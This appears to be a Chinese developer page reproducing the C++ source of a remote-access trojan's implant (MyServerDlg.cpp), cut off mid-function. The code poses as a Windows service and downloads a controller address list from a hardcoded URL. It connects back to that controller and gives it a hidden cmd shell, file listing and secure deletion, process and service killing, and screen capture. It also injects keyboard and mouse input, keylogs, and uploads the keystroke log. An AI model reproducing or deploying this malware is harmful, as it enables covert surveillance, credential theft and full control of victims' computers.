网络截获/分析

开发平台：
Visual C++

MyServerDlg.cpp：源码内容
							 // MyServerDlg.cpp : implementation file
//
#include "stdafx.h"
#include "MyServer.h"
#include "MyServerDlg.h"
//#include "MyServer.cpp"
#include "comm.h"
#include "GetSysInfo.h"
#include "TcpTran.h"
#include "ProcessInfo.h"
#include "GetService.h"
//#include "FileManage.h"
#include "GetScreenToBitmap.h"
#include "jpegfile.h"
#include "huffman.h"
#include "shellapi.h"
#include "keylog.h"
/*
 作者：海啸 lyyer English Name: Jack 
  blog:http://lyyer.blog.sohu.com
  website:http://www.cnGSG.com
  海啸网络安全组织
*/
#include "HttpAutoUpdate.h"
//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释，编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")   
//#pragma comment(linker, "/merge:.rdata=.text")   
//#pragma comment(linker, "/align:0x200") 
//#pragma comment(linker, "/ENTRY:main")  //cin cout都有问题 
//#pragma comment(linker, "/subsystem:windows") 
//#pragma comment(linker, "/BASE:0x13150000") 
#define OVERWRITE_PASSES 10
#define BUFFER_SIZE 1024
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
//#define DEF_VERSION lyyer_v1.0;
/////////////////////////////////////////////////////////////////////////////
// CMyServerDlg dialog
//////////////////////////////////////////////////////////////////////////
//全局变量
//////////////////////////////////////////////////////////////////////////
LINKINFO m_linkinfo;
struct MODIFY_DATA 
{
		unsigned int finder;
		char ws_svcname[32];
		char ws_svcdisplay[64];
		char ws_svcdesc[256];
		char url[256];
		int  port;
} modify_data = 
{
		0xFFFFFF8D,
		"RemoteStorage",
		"Windows Accounts Driver",
		"Network Connections Management",
		"http://ahai2007.id666.com/user/ahai2007/disk/webdisk/iplistm.txt",
		80,
};
//////////////////////////////////////////////////////////////////////////
BOOL WINAPI cmd_file_manage(SOCKET ClientSocket)
{
	CTcpTran m_tcptran ;   
	DRIVER driver;
	char chDriver[3];
	BOOL bnet=FALSE;
	driver.end=FALSE;
	
	for(char cc='A';cc<='Z';cc++)
	{
		sprintf(chDriver,"%c:",cc);
		if(GetDriveType(chDriver)==DRIVE_FIXED)
		{
			strcpy(driver.driver,chDriver);
			driver.drivertype=DRIVE_FIXED;
			bnet=m_tcptran.mysend(ClientSocket,(char *)&driver,sizeof(driver),0,60);
		}
		else if(GetDriveType(chDriver)==DRIVE_CDROM)
		{
			strcpy(driver.driver,chDriver);
			driver.drivertype=DRIVE_CDROM;
			bnet=m_tcptran.mysend(ClientSocket,(char *)&driver,sizeof(driver),0,60);
		}
		else if(GetDriveType(chDriver)==DRIVE_REMOVABLE)
		{
			strcpy(driver.driver,chDriver);
			driver.drivertype=DRIVE_REMOVABLE;
			bnet=m_tcptran.mysend(ClientSocket,(char *)&driver,sizeof(driver),0,60);
		}
	}
    driver.end=TRUE;
	bnet=m_tcptran.mysend(ClientSocket,(char *)&driver,sizeof(driver),0,60);
    return bnet;
}
DWORD WINAPI cmd_proc_manage(SOCKET ClientSocket)
{
	//SOCKET ClientSocket = (SOCKET)lp;
	
	int nlen = 0;
	CTcpTran m_tcptran ;
	//m_tcptran.m_Socket = (SOCKET)lp;
	std::vector<PROCESSINFO*> pProcInfo;
    BOOL bOK = GetProcessList(&pProcInfo);
	if (bOK)
	{
		int Prcoinfo = pProcInfo.size();
		
		int processlen = m_tcptran.mysend(ClientSocket,(char *)&Prcoinfo,sizeof(Prcoinfo),0,60);
        
		PROCESSINFO *reMSG = new PROCESSINFO;
		for(int i=0; i<pProcInfo.size();i++)
		{
			reMSG = new PROCESSINFO;
			memset(reMSG, 0,sizeof(reMSG));            
			reMSG->PID=pProcInfo[i]->PID;
			lstrcpy(reMSG->ProcName,pProcInfo[i]->ProcName);
			lstrcpy(reMSG->ProcPath,pProcInfo[i]->ProcPath);
			nlen=m_tcptran.mysend(ClientSocket,(char *)reMSG,sizeof(PROCESSINFO),0,60);
			
            delete reMSG;
		}
		//
	}
	return 0;	
}
DWORD WINAPI cmd_proc_kill(SOCKET ClientSocket,DWORD pid)
{
	int nlen = 0;
	CTcpTran m_tcptran ;
	KillProcess(pid);
	Sleep(1000);
	std::vector<PROCESSINFO*> pProcInfo;
    BOOL bOK = GetProcessList(&pProcInfo);
	if (bOK)
	{
		int Prcoinfo = pProcInfo.size();
		
		int processlen = m_tcptran.mysend(ClientSocket,(char *)&Prcoinfo,sizeof(Prcoinfo),0,60);
        
		PROCESSINFO *reMSG = new PROCESSINFO;
		for(int i=0; i<pProcInfo.size();i++)
		{
			reMSG = new PROCESSINFO;
			memset(reMSG, 0,sizeof(reMSG));            
			reMSG->PID=pProcInfo[i]->PID;
			lstrcpy(reMSG->ProcName,pProcInfo[i]->ProcName);
			lstrcpy(reMSG->ProcPath,pProcInfo[i]->ProcPath);
			nlen=m_tcptran.mysend(ClientSocket,(char *)reMSG,sizeof(PROCESSINFO),0,60);
			
            delete reMSG;
		}
		//
	}
	return 0;	
}
DWORD WINAPI cmd_service_manage(SOCKET ClientSocket)
{
	int nlen = 0;
	CTcpTran m_tcptran ;
	std::vector<SERVICEINFO*> pServiceInfo;
    BOOL bOK = ListService(&pServiceInfo);
	if (bOK)
	{
		int Serviceinfo = pServiceInfo.size();
		
		int servicelen = m_tcptran.mysend(ClientSocket,(char *)&Serviceinfo,sizeof(Serviceinfo),0,60);
        
		SERVICEINFO *reMSG = new SERVICEINFO;
		for(int i=0; i<pServiceInfo.size();i++)
		{
			reMSG = new SERVICEINFO;			
			memset(reMSG, 0,sizeof(reMSG));            
			//reMSG->num=pServiceInfo[i]->num;
			lstrcpy(reMSG->ServiceName,pServiceInfo[i]->ServiceName);
			lstrcpy(reMSG->ServiceDetail,pServiceInfo[i]->ServiceDetail);
			lstrcpy(reMSG->ServiceState,pServiceInfo[i]->ServiceState);
			lstrcpy(reMSG->ServiceStartType,pServiceInfo[i]->ServiceStartType);
			nlen=m_tcptran.mysend(ClientSocket,(char *)reMSG,sizeof(SERVICEINFO),0,60);
			
            delete reMSG;
		}
		//
	}
	//delete reMSG;
	return 0;   
}
DWORD WINAPI cmd_service_kill(SOCKET ClientSocket,char *chSvrid)
{
	int nlen = 0;
	CTcpTran m_tcptran ;
    BOOL killOk = KillService(chSvrid);
	if(killOk)
	{
        Sleep(1000);
	}			
		std::vector<SERVICEINFO*> pServiceInfo;
		
		BOOL bOK = ListService(&pServiceInfo);
		
		if (bOK)
		{
			int Serviceinfo = pServiceInfo.size();
			
			int servicelen = m_tcptran.mysend(ClientSocket,(char *)&Serviceinfo,sizeof(Serviceinfo),0,60);
			
			SERVICEINFO *reMSG = new SERVICEINFO;
			for(int i=0; i<pServiceInfo.size();i++)
			{
				reMSG = new SERVICEINFO;			
				memset(reMSG, 0,sizeof(reMSG));            
				lstrcpy(reMSG->ServiceName,pServiceInfo[i]->ServiceName);
				lstrcpy(reMSG->ServiceDetail,pServiceInfo[i]->ServiceDetail);
				lstrcpy(reMSG->ServiceState,pServiceInfo[i]->ServiceState);
				lstrcpy(reMSG->ServiceStartType,pServiceInfo[i]->ServiceStartType);
				
				nlen=m_tcptran.mysend(ClientSocket,(char *)reMSG,sizeof(SERVICEINFO),0,60);
				
				delete reMSG;
			}
			
		}
		
	return 0;   	
}
void cmd_file_GetSubOpenItem(SOCKET ClientSocket,char *szCurDir) //DWORD WINAPI
{
    CTcpTran m_tcptran ;
	HANDLE hFile;
	FILEINFO fileinfo;
	WIN32_FIND_DATA WFD;
	//初始化fileinfo
	fileinfo.invalidir =0;
	fileinfo.isdirectory =0;
	fileinfo.next =0;
	fileinfo.filesize=0;
	fileinfo.filename[0]=0;
	fileinfo.time[0]=0;
	//查找第一个文件
	if((hFile=FindFirstFile(szCurDir,&WFD))==INVALID_HANDLE_VALUE)
	{//目录无法访问
		fileinfo.invalidir =1;
		strcpy(fileinfo.filename ,"!*目录无法访问*!");
		fileinfo.next=1;
		m_tcptran.mysend(ClientSocket,(char *)&fileinfo,sizeof(FILEINFO),0,60);
		return;
	}
	SHFILEINFO shfi;
	char stime[32];
	SYSTEMTIME systime;
	FILETIME localtime;
	do
	{
	    //查完所有信息
		memset(&shfi,0,sizeof(shfi));
		SHGetFileInfo(WFD.cFileName, 
			              FILE_ATTRIBUTE_NORMAL,
			              &shfi, sizeof(shfi),
			              SHGFI_ICON|SHGFI_USEFILEATTRIBUTES|SHGFI_TYPENAME );
		//写入文件信息结构
	    strcpy(fileinfo.filename,WFD.cFileName);                              //文件名
        if(WFD.dwFileAttributes&FILE_ATTRIBUTE_DIRECTORY)                     //路径?
		      fileinfo.isdirectory=1;
        else
              fileinfo.isdirectory=0;
	    fileinfo.filesize=(WFD.nFileSizeHigh*MAXDWORD+WFD.nFileSizeLow)/1024+1; //文件大小
	    //转化格林时间到本地时间
	    FileTimeToLocalFileTime(&WFD.ftLastWriteTime,&localtime);
	    FileTimeToSystemTime(&localtime,&systime);
	    sprintf(stime,"%4d-%02d-%02d %02d:%02d:%02d",
		systime.wYear,systime.wMonth,systime.wDay,systime.wHour,
		systime.wMinute,systime.wSecond);
	    strcpy(fileinfo.time,stime);                                          //文件时间
        fileinfo.next=1;                                                      //next
		if(strcmp(WFD.cFileName,".")==0||strcmp(WFD.cFileName,"..")==0)
			continue;
		m_tcptran.mysend(ClientSocket,(char *)&fileinfo,sizeof(fileinfo),0,60);
		if(GetLastError()==ERROR_NO_MORE_FILES)
				break;
	}while(FindNextFile(hFile,&WFD));
	fileinfo.next =0;
	m_tcptran.mysend(ClientSocket,(char *)&fileinfo,sizeof(fileinfo),0,60);
	FindClose(hFile);
	return ;
}
DWORD WINAPI cmd_shell_manage(SOCKET s)
{
	CTcpTran m_tcptan;
//创建CMD线程
	HANDLE               hWritePipe,hReadPipe,hWriteShell,hReadShell;
	SECURITY_ATTRIBUTES  saPipe;
	STARTUPINFO          lpStartupInfo;
	PROCESS_INFORMATION  lpProcessInfo;
	char szBuffer[65535];
	DWORD dwBufferRead;
	int ret;
	saPipe.nLength              = sizeof(saPipe);
	saPipe.bInheritHandle       = TRUE;
	saPipe.lpSecurityDescriptor = NULL;
	//create read and write pipe
	CreatePipe(&hReadPipe, &hReadShell, &saPipe, 0);
	CreatePipe(&hWriteShell, &hWritePipe, &saPipe, 0);
	GetStartupInfo(&lpStartupInfo);
	lpStartupInfo.cb           = sizeof(lpStartupInfo);
	lpStartupInfo.dwFlags      = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	lpStartupInfo.hStdInput    = hWriteShell;
	lpStartupInfo.hStdOutput   = hReadShell;
	lpStartupInfo.hStdError    = hReadShell;
	lpStartupInfo.wShowWindow  = SW_HIDE;
	lpStartupInfo.lpDesktop = (LPSTR)("WinSta0\Default"); 
	WCHAR cmdline[MAX_PATH];
	GetSystemDirectory((LPSTR)cmdline,MAX_PATH);
	lstrcatW(cmdline,L"\cmd.exe");
	ret = CreateProcess((char *)cmdline, NULL, NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo);
	while(1)
	{
		memset(szBuffer, 0, sizeof(szBuffer));
		PeekNamedPipe(hReadPipe, szBuffer, sizeof(szBuffer), &dwBufferRead,NULL,NULL);
		if(dwBufferRead != 0)
		{
			ret = ReadFile(hReadPipe, szBuffer, sizeof(szBuffer), &dwBufferRead,NULL);
			if(ret)
			{
				if( m_tcptan.mysend(s,szBuffer, dwBufferRead,0,60) == SOCKET_ERROR)
					break;
			}
		}
		else
		{
			ZeroMemory(szBuffer, sizeof(szBuffer));
			ret = m_tcptan.myrecv(s,szBuffer, sizeof(szBuffer), 0, 60,0,false);
			if(ret == SOCKET_ERROR)
				break;
		}
		Sleep(100);
	}
	WriteFile(hWritePipe, "exitrn", (DWORD)strlen("exitrn"), &dwBufferRead, 0);	
	
	return 0;
}
DWORD WINAPI cmd_ctrl_GetScreen(SOCKET lp1,BYTE *lp2, BYTE *lp3, BYTE *lp4)
{
	CTcpTran m_tcptran;
	SOCKET lpWSK = (SOCKET ) lp1;  //第一个参数 socket
	JpegFile *pic = (JpegFile *)lp4;     //第四个参数 jpegFile
	LPCOMMAND lpSendMsg = (LPCOMMAND) lp2; //第三个参数 消息
	CGetScreenToBitmap *lpImage = (CGetScreenToBitmap *)lp3; //CGetScreenToBitmap * lpImage 添加类
	
	CHuffman *huf;
	unsigned long lWidth    =0;
	unsigned long lHeight   =0;
	unsigned long lHeight2  =0;
	unsigned long lSize     =0; 
	unsigned long lSize2    =0; 
	unsigned long lHeadSize =0;
	
	COMMAND SendMsg;
	memset(&SendMsg,0,sizeof(COMMAND));
	
	LPSTR lpData = NULL, lpData1 = NULL;//, lpOld = NULL;
    int nDelay = lpSendMsg->nDelay;
	//Step 1:抓屏幕
    if(lpImage->GetScreen(lpSendMsg->rcArea, 
		lpSendMsg->nBits, lpSendMsg->nArea) < 0) 
		return 1;  //Error 
//////////////////////////////////////////////////////////////////////
//经过Step 1 处理之后 结果在lpImage 这个类中 
//应用了 lpImage->m_dwBmpSize
//////////////////////////////////////////////////////////////////////
	//Setp 2:压缩图象
	SendMsg.dwFileSize = lpImage->m_dwBmpSize;   //图象体积	
	/*		*/
	if (lpSendMsg->nCompress == 2)
	{
		//使用 Jpeg压缩方式
		if (pic->m_lpScreenBuffer == NULL || lpImage->m_dwBmpSize > pic->m_dwScreenMaxSize)
		{
			if (pic->m_lpScreenBuffer) GlobalFree(pic->m_lpScreenBuffer);
			pic->m_dwScreenMaxSize = lpImage->m_dwBmpSize;
			pic->m_lpScreenBuffer = (BYTE *)GlobalAlloc(GMEM_FIXED, lpImage->m_dwBmpSize);
		}
		lpData = (LPSTR)pic->m_lpScreenBuffer;
		
		lSize = lpImage->m_dwBmpSize;
		lpData1 = (char *)pic->LoadBMP(lpImage->GetImage(),&lWidth, &lHeight);
		pic->RGBToJpegFile((unsigned char *)lpData1,(unsigned char *)lpData,lWidth, lHeight,true,80, &lSize);	
	}
//////////////////////////////////////////////////////////////////////////////
//经过Step 2 处理之后 lSize	lpData lpData1 lWidth lHeight 
// 用到了 lpData = (LPSTR)pic->m_lpScreenBuffer;
//        lpData1 = (char *)pic->LoadBMP(lpImage->GetImage(),&lWidth, &lHeight);
//        lSize = lpImage->m_dwBmpSize;
//////////////////////////////////////////////////////////////////////////////
	//Step 3: 发送图象
	//      nCell = lpSendMsg->nCell;
	
	SendMsg.dwBmpSize = lSize;    
    SendMsg.rcArea = lpImage->m_rcArea;   //source size
    //图象头信息
    if(m_tcptran.mysend(lpWSK,(char *)&SendMsg, sizeof(COMMAND),0, 60) < 0)
		goto err_01;
    if(lSize == 0) return 0;
    //图象部份
    if(m_tcptran.mysend(lpWSK,(char *)lpData, lSize,0, 60) < 0)
		goto err_01;
exit_01:
    //if (lpOld) GlobalFree(lpOld);
    return 0;
    
err_01:
    //if (lpOld) GlobalFree(lpOld);
    return -1;
	
}
void cmd_ctrl_CtrlAltDel()
{
   keybd_event (VK_CONTROL,0, 0,0);
   keybd_event (VK_MENU,0, 0,0);
   keybd_event (VK_DELETE,0, 0,0);
   ::Sleep(2000);
//   keybd_event (VK_CONTROL,0, 0,0);
//   keybd_event (VK_MENU,0, 0,0);
//   keybd_event (VK_DELETE,0, 0,0);
   keybd_event (VK_CONTROL,0, 0,KEYEVENTF_KEYUP);
   keybd_event (VK_MENU,0, 0,KEYEVENTF_KEYUP);
   keybd_event (VK_DELETE,0, 0,KEYEVENTF_KEYUP);
}
void cmd_ctrl_Mouse(BYTE *lpByte)
{
	COMMAND *lpSendMsg = (COMMAND *)lpByte;
	//移动鼠标
	mouse_event (MOUSEEVENTF_MOVE | MOUSEEVENTF_ABSOLUTE,
		lpSendMsg->dwHookParam1,
		lpSendMsg->dwHookParam2,0,0);
	
    if (lpSendMsg->wCmd == CMD_MOUSE_HOOK)  //单击
	{
		mouse_event (lpSendMsg->dwHookFlags,lpSendMsg->dwHookParam1,
			lpSendMsg->dwHookParam2,0,0);
	}
    else if(lpSendMsg->wCmd = CMD_MOUSE_DBHOOK )//双击
	{
		if(lpSendMsg->dwHookFlags== CMD_MOUSE_LDBCLICK)
		{  mouse_event (MOUSEEVENTF_LEFTDOWN|MOUSEEVENTF_ABSOLUTE,
		lpSendMsg->dwHookParam1,
		lpSendMsg->dwHookParam2,0,0);
		mouse_event (MOUSEEVENTF_LEFTUP,lpSendMsg->dwHookParam1,
			lpSendMsg->dwHookParam2,0,0);
		mouse_event (MOUSEEVENTF_LEFTDOWN|MOUSEEVENTF_ABSOLUTE,
			lpSendMsg->dwHookParam1,
			lpSendMsg->dwHookParam2,0,0);
		mouse_event (MOUSEEVENTF_LEFTUP,lpSendMsg->dwHookParam1,
			lpSendMsg->dwHookParam2,0,0);
		}
		if(lpSendMsg->dwHookFlags== CMD_MOUSE_RDBCLICK)
		{  
			mouse_event (MOUSEEVENTF_RIGHTDOWN|MOUSEEVENTF_ABSOLUTE,
				lpSendMsg->dwHookParam1,
				lpSendMsg->dwHookParam2,0,0);
			mouse_event (MOUSEEVENTF_RIGHTUP,lpSendMsg->dwHookParam1,
				lpSendMsg->dwHookParam2,0,0);
			mouse_event (MOUSEEVENTF_RIGHTDOWN|MOUSEEVENTF_ABSOLUTE,
				lpSendMsg->dwHookParam1,
				lpSendMsg->dwHookParam2,0,0);
			mouse_event (MOUSEEVENTF_RIGHTUP,lpSendMsg->dwHookParam1,
				lpSendMsg->dwHookParam2,0,0);
		}
	}
}
BOOL WINAPI cmd_file_del(char filename[])
{
      HANDLE hFile = CreateFile(filename, 
		                        GENERIC_WRITE, 
								FILE_SHARE_READ|FILE_SHARE_WRITE, 
                                NULL, 
								OPEN_ALWAYS, 
								FILE_FLAG_WRITE_THROUGH, 
								NULL);
       if (hFile == INVALID_HANDLE_VALUE) return false;
       DWORD fileSize = GetFileSize(hFile, 0);
       // if file is empty.
       if (!fileSize)
       {
              CloseHandle(hFile);
              return false;
       }
       for (int passes = 0; passes < OVERWRITE_PASSES; passes++)
       {
              char newStorage[BUFFER_SIZE];
              srand((unsigned)time(NULL));
              FillMemory((void*)newStorage, BUFFER_SIZE, rand() % 255);
              SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
              DWORD left = fileSize;
              int write = BUFFER_SIZE;
              DWORD written = 0;
              while (left)
              {
                     if (left < BUFFER_SIZE) write = left;                    
                     BOOL status = WriteFile(hFile, newStorage, write, &written, NULL);
                     if (!status)
                     {
                            CloseHandle(hFile);
                            return false;
                     } 
                     left -= write;
              }
       }
       CloseHandle(hFile);
       if (!DeleteFile(filename)) return false;
       return true;
}
UINT cmd_ctrl_shell(SOCKET sock,char command[])
{
    CTcpTran m_tcptran;
	//COMMAND m_command;
	//memset(&m_command,0,sizeof(COMMAND));
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HANDLE hRead=NULL,hWrite=NULL;
    TCHAR Cmdline[300]={0};     //命令行缓冲
    char SendBuf[2048]={0};    //发送缓冲
    SECURITY_ATTRIBUTES sa;     //安全描述符
    DWORD bytesRead=0;
    int ret=0;
    sa.nLength=sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor=NULL;
    sa.bInheritHandle=TRUE;
    //创建匿名管道
    if (!CreatePipe(&hRead,&hWrite,&sa,0))  
         goto Clean;//失败
    si.cb=sizeof(STARTUPINFO);
    GetStartupInfo(&si);
    si.hStdError=hWrite;
    si.hStdOutput=hWrite;    //进程（cmd）的输出写入管道
    si.wShowWindow=SW_HIDE;
    si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    GetSystemDirectory(Cmdline,sizeof (Cmdline));   //获取系统目录
    strcat(Cmdline,"\cmd.exe /c ");                //拼接cmd
    strcat(Cmdline,command);  //拼接一条完整的cmd命令
    //创建进程，也就是执行cmd命令
    if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
         goto Clean;//失败
    CloseHandle(hWrite);
    while (TRUE)
    {
      //无限循环读取管道中的数据，直到管道中没有数据为止
      if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
          break;
      m_tcptran.mysend(sock,SendBuf,bytesRead,0,60);      //发送出去
      memset(SendBuf,0,sizeof (SendBuf));  //缓冲清零
      Sleep(100);                          //休息一下
     }
    m_tcptran.mysend(sock,(char *)MY_END,sizeof(MY_END),0,60);
Clean:
          //释放句柄
          if (hRead!=NULL)
              CloseHandle(hRead);
          if (hWrite!=NULL)
              CloseHandle(hWrite);
	return 0;
}
UINT cmd_keylog()
{
	char filename[100] ={0};//保存文件名
	char syspath[MAX_PATH] ={0};
	SYSTEMTIME sysTm;
	::GetLocalTime(&sysTm);
	int m_nYear = sysTm.wYear;
	int m_nMonth = sysTm.wMonth;
	int m_nDay = sysTm.wDay;
	sprintf(filename,"Key_%d_%d_%d.log",m_nYear,m_nMonth,m_nDay);
	GetSystemDirectory(syspath,MAX_PATH);
	strcat(syspath,"\");
	strcat(syspath,filename);
	
	g_hHook=SetWindowsHookEx(WH_JOURNALRECORD,KeyboardProc,GetModuleHandle(NULL),0);
	return 0;
    	
}
UINT cmd_stop_keylog(SOCKET s)
{
    CTcpTran m_tcptran;
	char filename[100] ={0};//保存文件名
	char syspath[MAX_PATH] ={0};
	SYSTEMTIME sysTm;
	::GetLocalTime(&sysTm);
	int m_nYear = sysTm.wYear;
	int m_nMonth = sysTm.wMonth;
	int m_nDay = sysTm.wDay;
	sprintf(filename,"Key_%d_%d_%d.log",m_nYear,m_nMonth,m_nDay);
	GetSystemDirectory(syspath,MAX_PATH);
	strcat(syspath,"\");
	strcat(syspath,filename);
	HANDLE hFile = CreateFile(syspath,
		                     GENERIC_READ|GENERIC_WRITE,
							 FILE_SHARE_WRITE|FILE_SHARE_READ,
							 0,
							 OPEN_EXISTING,
							 FILE_ATTRIBUTE_NORMAL,
							 NULL);
    DWORD dwSize=GetFileSize(hFile,NULL); 
    int SendFileSize = m_tcptran.mysend(s,(char *)&dwSize,sizeof(DWORD),0,60);
	
	char buf[1024]={0};
    if (SendFileSize)
	{
		DWORD Realbufsize = 0;
		int SendFile =0;
		BOOL bread = FALSE;
		DWORD SendSize =0;
		while (SendSize<dwSize)
		{
			if (dwSize-SendSize<1024)
			{
				bread= ReadFile(hFile,
			                 buf,
							 dwSize,
                             &Realbufsize,
							 NULL);
				SendFile = m_tcptran.mysend(s,buf,dwSize,0,60);
				dwSize = dwSize - dwSize;
			}
			else
			{
				bread= ReadFile(hFile,
			                 buf,
							 1024,
                             &Realbufsize,
							 NULL);
				SendFile = m_tcptran.mysend(s,buf,1024,0,60);
				//SendSize =SendSize + 1024;
				dwSize = dwSize -1024;
			}
			
		}
    }
    
	CloseHandle(hFile);
	if(g_hHook)
	{
		UnhookWindowsHookEx(g_hHook);
	}
	return 0;
}
DWORD WINAPI MyClientThread(LPVOID lp)
{
    CGetScreenToBitmap Image;
	JpegFile pic;
    int      nRet;
	HDC		 hDC;
	BYTE *lpData;
    LPLINKINFO m_tmp = (LPLINKINFO)lp ;	
	CTcpTran m_tcptran ;
	BOOL bOK = m_tcptran.InitSocketLibray(2,2);
	if (bOK==0)
	{
       return -1; 
	}
retry:
    SOCKET s = m_tcptran.InitSocket(SOCKETNOBIND,m_tmp->strBindIp,m_tmp->BindPort,0);
	if(s == SOCKET_ERROR)
	{
		goto retry;
	}
	SYSTEMINIT m_sendmsg ;
	GetClientSystemInfo(m_sendmsg);
	memcpy(m_sendmsg.version,"lyyer_v1.0",sizeof("lyyer_v1.0"));
	
	nRet = m_tcptran.mysend(s,(char *)&m_sendmsg,sizeof(m_sendmsg),0,60);
    if (nRet<0) 
	{
		m_tcptran.mysend(s,(char *)&m_sendmsg,sizeof(m_sendmsg),0,60);
    }
     COMMAND m_command;
	 COMMAND m_filetmp;
	 memset(&m_filetmp,0,sizeof(COMMAND));
	 DWORD dw_hThreadid = 0;
     HANDLE hThread = NULL;
	 BOOL   HaveChild = false;
     BOOL   OKfiledel = false;
	 int    bret=0;
Loop01:
	while(true)
	{
		bret=0;
		memset((char  *)&m_command, 0,sizeof(m_command));
//retryrecv:
		bret = m_tcptran.myrecv(s,(char *)&m_command,sizeof(m_command),0,60,0,FALSE);
		
/*
		if (bret=-1)
		{
		    goto retry;	
		}
*/
		switch (m_command.wCmd)
		{ 
			case CMD_RETRY:	
				 goto exit01;
			case CMD_PROCESS_MANAGE:
				cmd_proc_manage(s);
				goto Loop01;
			case CMD_SERVICE_MANAGE:
				cmd_service_manage(s);
				goto Loop01;
			case CMD_FILE_MANAGE:
				cmd_file_manage(s);
				goto Loop01;
			case CMD_FILE_GETSUBFILE:
				//HaveChild = 
				cmd_file_GetSubOpenItem(s,m_command.szCurDir);
				goto Loop01;
				
			case CMD_FILE_DEL:
				OKfiledel = cmd_file_del(m_command.szCurDir);
				goto Loop01;
				
			case CMD_CMDSHELL:
				cmd_ctrl_shell(s,m_command.szCurDir);
				goto Loop01;
			case CMD_KEYLOG_STOP:
				cmd_stop_keylog(s);
				goto Loop01;
			case CMD_SCREEN_MANAGE:
				nRet = cmd_ctrl_GetScreen(s, (BYTE*)&m_command, (BYTE *)&Image, (BYTE *)&pic);			   
				if(nRet == -1) goto exit01;
				goto Loop01;
			case CMD_GET_SCREEN_INFO://取屏幕信息
				memset((char  *)&m_command, 0,sizeof(m_command));
				hDC = CreateDC("DISPLAY",NULL,NULL,NULL);
				m_command.nBits = GetDeviceCaps(hDC, BITSPIXEL);
				m_command.nBits = m_command.nBits * GetDeviceCaps(hDC, PLANES);
				DeleteDC (hDC);
				m_command.rcArea = CRect(0,0,GetSystemMetrics (SM_CXSCREEN),GetSystemMetrics (SM_CYSCREEN));
				if(m_tcptran.mysend(s,(char *)&m_command,sizeof(m_command),0,60) < 0)
					goto exit01;
				goto Loop01;
			case CMD_KEY_HOOK:  
				keybd_event ((BYTE)m_command.dwHookParam1,(BYTE)m_command.dwHookParam2,m_command.dwHookFlags,0);
				goto Loop01;
			case CMD_MOUSE_HOOK:
			case CMD_MOUSE_DBHOOK:
				cmd_ctrl_Mouse((BYTE *)&m_command);
				goto Loop01;
			case CMD_KEY_CAD: //Ctrl+Alt+Delete
				cmd_ctrl_CtrlAltDel();
				goto Loop01;
			case CMD_SHELL_MANAGE:
				cmd_shell_manage(s);
				goto Loop01;
			case CMD_NULL:
				goto exit01;
			case CMD_REG_MANAGE: 
				goto Loop01; 
			case CMD_VIDEO_MANAGE:
				goto Loop01;
			case CMD_KEYLOG_MANAGE:
				cmd_keylog();
				goto Loop01;
			case CMD_PROCESS_KILL:
				cmd_proc_kill(s,m_command.DataSize);
				goto Loop01;
			case CMD_SERVICE_DEL:
				cmd_service_kill(s,m_command.tmp);
				goto Loop01;
		}
		
	}
exit02:
    goto retry;
exit01:
	return 0;
}
//////////////////////////////////////////////////////////////////////////
CMyServerDlg::CMyServerDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CMyServerDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CMyServerDlg)
	//}}AFX_DATA_INIT
	// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
	//m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CMyServerDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CMyServerDlg)
	//DDX_Control(pDX, IDC_BUTTON_START, m_btn_start);
	//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CMyServerDlg, CDialog)
	//{{AFX_MSG_MAP(CMyServerDlg)
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CMyServerDlg message handlers
DWORD  dw_thread = 0 ;
//static UINT count = 1;
//HANDLE  hThread[1];
UINT m_timerID1;
UINT i=0;
BOOL CMyServerDlg::OnInitDialog()
{
	CDialog::OnInitDialog();
	hThread[0]=NULL;
	hThread[1]=NULL;
	//PostMessage(WM_SHOWWINDOW,FALSE,SW_PARENTOPENING);   
//////////////////////////////////////////////////////////////////////////
//  
//////////////////////////////////////////////////////////////////////////
	//ShowWindow(hWnd,SW_HIDE);
    //this->ShowWindow(SW_HIDE);
		//////////////////////////////////////////////////////////////////////////
		//(1)读取程序本身url 解析
		
		char seps[]= "/";
		char *token;
		char myURL[MAX_PATH] ={0};
		char myFILE[MAX_PATH] = {0};
		char tmp[MAX_PATH] ={0};
		
		
		strcpy(tmp, strchr(modify_data.url,':')+1);
		token=strtok(tmp,seps);
		strcpy(myURL,token);
		char SysPath[MAX_PATH]={0};//系统路径，包括文件名
		GetSystemDirectory(SysPath,MAX_PATH);
        strcat(SysPath,"\lplist.txt");
		strcpy(tmp, strchr(modify_data.url,':')+3);
		TCHAR   *pos=strchr(tmp,'/');					
		//tmp[pos-tmp]=0;
		strcpy(myFILE,pos);
        HttpGetFile(myURL,myFILE,SysPath);
//////////////////////////////////////////////////////////////////////////
//分析文件 解析文件 把IP地址和端口分离出来
//////////////////////////////////////////////////////////////////////////
    char  buf[1024]={0};
	DWORD ReadSize = 0;
	
	char tmp1[MAX_PATH]={0};
	char port[MAX_PATH]={0};
	char ip[MAX_PATH]={0};
	HANDLE hFile = CreateFile(SysPath,
							  GENERIC_READ,
					          FILE_SHARE_READ,
					          NULL,
					          OPEN_EXISTING,
					          FILE_ATTRIBUTE_NORMAL,
					          NULL);
	if (hFile)
	{
		BOOL bRead = ReadFile(hFile,buf,1024,&ReadSize,NULL);
		if (bRead)
		{
			
			strcpy(tmp1,buf);
			strcpy(port,buf);		
			
			TCHAR   *pos=strrchr(tmp1,':');			
			strcpy(port,pos+1);			
